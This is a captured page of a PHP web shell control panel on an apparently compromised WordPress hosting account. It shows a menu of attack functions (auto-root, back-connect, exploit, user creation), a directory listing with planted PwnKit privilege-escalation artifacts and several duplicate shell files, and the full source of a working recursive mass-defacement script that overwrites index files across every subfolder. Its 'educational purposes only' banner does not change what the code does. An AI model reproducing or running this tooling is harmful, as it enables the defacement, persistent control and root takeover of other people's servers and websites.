Linux server1.fila77.net 4.18.0-553.125.1.el8_10.x86_64 #1 SMP Wed May 20 11:06:10 EDT 2026 x86_64
Apache
: 184.94.212.131 | : 216.73.216.63
Cant Read [ /etc/named.conf ]
8.2.31
fila77
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
fila77 /
public_html /
hokibet303.org /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
.well-known
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
wp-admin
[ DIR ]
drwxr-xr-x
wp-content
[ DIR ]
drwxr-xr-x
wp-includes
[ DIR ]
drwxr-xr-x
.htaccess
248
B
-rw-r--r--
.htaccess.bk
514
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
api.php
30.29
KB
-rw-r--r--
error_log
27.23
MB
-rw-r--r--
index.php
143.87
KB
-r--r--r--
license.txt
19.44
KB
-rw-r--r--
mass-all.php
5.51
KB
-rw-r--r--
mou.php
143.87
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
readme.html
7.23
KB
-rw-r--r--
wp-activate.php
7.2
KB
-rw-r--r--
wp-blog-header.php
351
B
-rw-r--r--
wp-comments-post.php
2.27
KB
-rw-r--r--
wp-config-sample.php
3.26
KB
-rw-r--r--
wp-config.php
3.22
KB
-rw-------
wp-cron.php
5.49
KB
-rw-r--r--
wp-links-opml.php
2.43
KB
-rw-r--r--
wp-load.php
3.84
KB
-rw-r--r--
wp-login.php
50.63
KB
-rw-r--r--
wp-mail.php
8.52
KB
-rw-r--r--
wp-settings.php
31.88
KB
-rw-r--r--
wp-signup.php
33.81
KB
-rw-r--r--
wp-trackback.php
5.09
KB
-rw-r--r--
xmlrpc.php
3.13
KB
-rw-r--r--
yuifgf.php
143.87
KB
-rw-------
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mass-all.php
<?php // === RECURSIVE FOLDER MASS DEFACER === // FOR EDUCATIONAL PURPOSES ONLY // Use only on systems you have FULL permission to test. // Set default values $base_dir = isset($_POST['base_dir']) ? $_POST['base_dir'] : getcwd(); $filename = isset($_POST['filename']) ? $_POST['filename'] : 'index.php'; $content = isset($_POST['content']) ? $_POST['content'] : 'Hacked by AI'; function recursiveDeface($dir, $file_name, $content, &$success_count = 0, &$fail_count = 0) { // Check if directory is accessible and writable if (!is_dir($dir) || !is_readable($dir)) { $fail_count++; echo ">>> <strong>" . htmlspecialchars($dir) . "</strong> <span style='color:red;'>✗ (Unreadable)</span><br>"; return; } // Full path to the target deface file $index_file = $dir . DIRECTORY_SEPARATOR . $file_name; // Try to write the deface file if (file_put_contents($index_file, $content) !== false) { echo ">>> <strong>" . htmlspecialchars($index_file) . "</strong> <span style='color:lime;'>✓</span><br>"; $success_count++; } else { echo ">>> <strong>" . htmlspecialchars($index_file) . "</strong> <span style='color:red;'>✗ (Write Failed)</span><br>"; $fail_count++; } // Scan all contents $items = scandir($dir); foreach ($items as $item) { $path = $dir . DIRECTORY_SEPARATOR . $item; // Recurse into subdirectories (skip . and ..) if ($item !== '.' && $item !== '..' && is_dir($path)) { recursiveDeface($path, $file_name, $content, $success_count, $fail_count); } } } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Recursive Folder Mass Defacer</title> <link href="https://fonts.googleapis.com/css?family=Electrolize" rel="stylesheet"> <style> body { background: #111; font-family: 'Electrolize', sans-serif; color: lime; text-align: center; padding: 20px; } h2 { color: #fff; text-shadow: 0 0 5px lime; } .container { max-width: 800px; margin: 0 auto; background: #000; padding: 20px; border: 1px solid lime; border-radius: 10px; } input[type="text"], textarea { width: 80%; padding: 8px; margin: 5px; background: #000; color: lime; border: 1px solid lime; border-radius: 5px; font-family: 'Electrolize', monospace; } textarea { height: 100px; } input[type="submit"] { background: lime; color: #000; font-weight: bold; padding: 10px 20px; border: none; cursor: pointer; border-radius: 5px; margin-top: 10px; } input[type="submit"]:hover { background: #0f0; transform: scale(1.05); } .result { text-align: left; margin: 20px auto; padding: 10px; background: #111; border: 1px dashed lime; border-radius: 5px; color: lime; white-space: pre-wrap; font-family: monospace; max-height: 400px; overflow-y: auto; } hr { border: 1px dashed lime; width: 80%; } img { border-radius: 10px; margin: 10px; } </style> </head> <body> <div class="container"> <h2>Recursive Folder Mass Defacer</h2> <img src="https://image.spreadshirtmedia.net/image-server/v1/designs/14727496,width=178,height=178,version=1385625201/fuck-anonymous-mask.png" alt="Hack Mask"> <form method="POST"> <label>Target Folder:</label><br> <input type="text" name="base_dir" value="<?= htmlspecialchars($base_dir) ?>" size="50"><br><br> <label>File Name (e.g. index.php):</label><br> <input type="text" name="filename" value="<?= htmlspecialchars($filename) ?>" size="40"><br><br> <label>Deface Content:</label><br> <textarea name="content"><?= htmlspecialchars($content) ?></textarea><br> <input type="submit" value="DEFACE ALL FOLDERS & SUBFOLDERS !!!"> </form> <hr> <?php if (isset($_POST['base_dir'])) { $dir = trim($_POST['base_dir']); $file_name = $_POST['filename'] ?: 'index.php'; $content = $_POST['content']; if (!file_exists($dir)) { echo "<p style='color:red;'><strong>Error:</strong> Directory '$dir' not found.</p>"; } elseif (!is_dir($dir)) { echo "<p style='color:red;'><strong>Error:</strong> '$dir' is not a valid directory.</p>"; } elseif (!is_writable($dir) && !is_writable(dirname($dir))) { echo "<p style='color:red;'><strong>Error:</strong> Directory '$dir' is not writable.</p>"; } else { echo "<div class='result'>"; echo "<strong>Starting recursive deface...</strong><br>"; $success = 0; $fail = 0; recursiveDeface($dir, $file_name, $content, $success, $fail); echo "<hr><strong>Summary:</strong> $success success, $fail failures."; echo "</div>"; } } ?> </div> </body> </html>
Close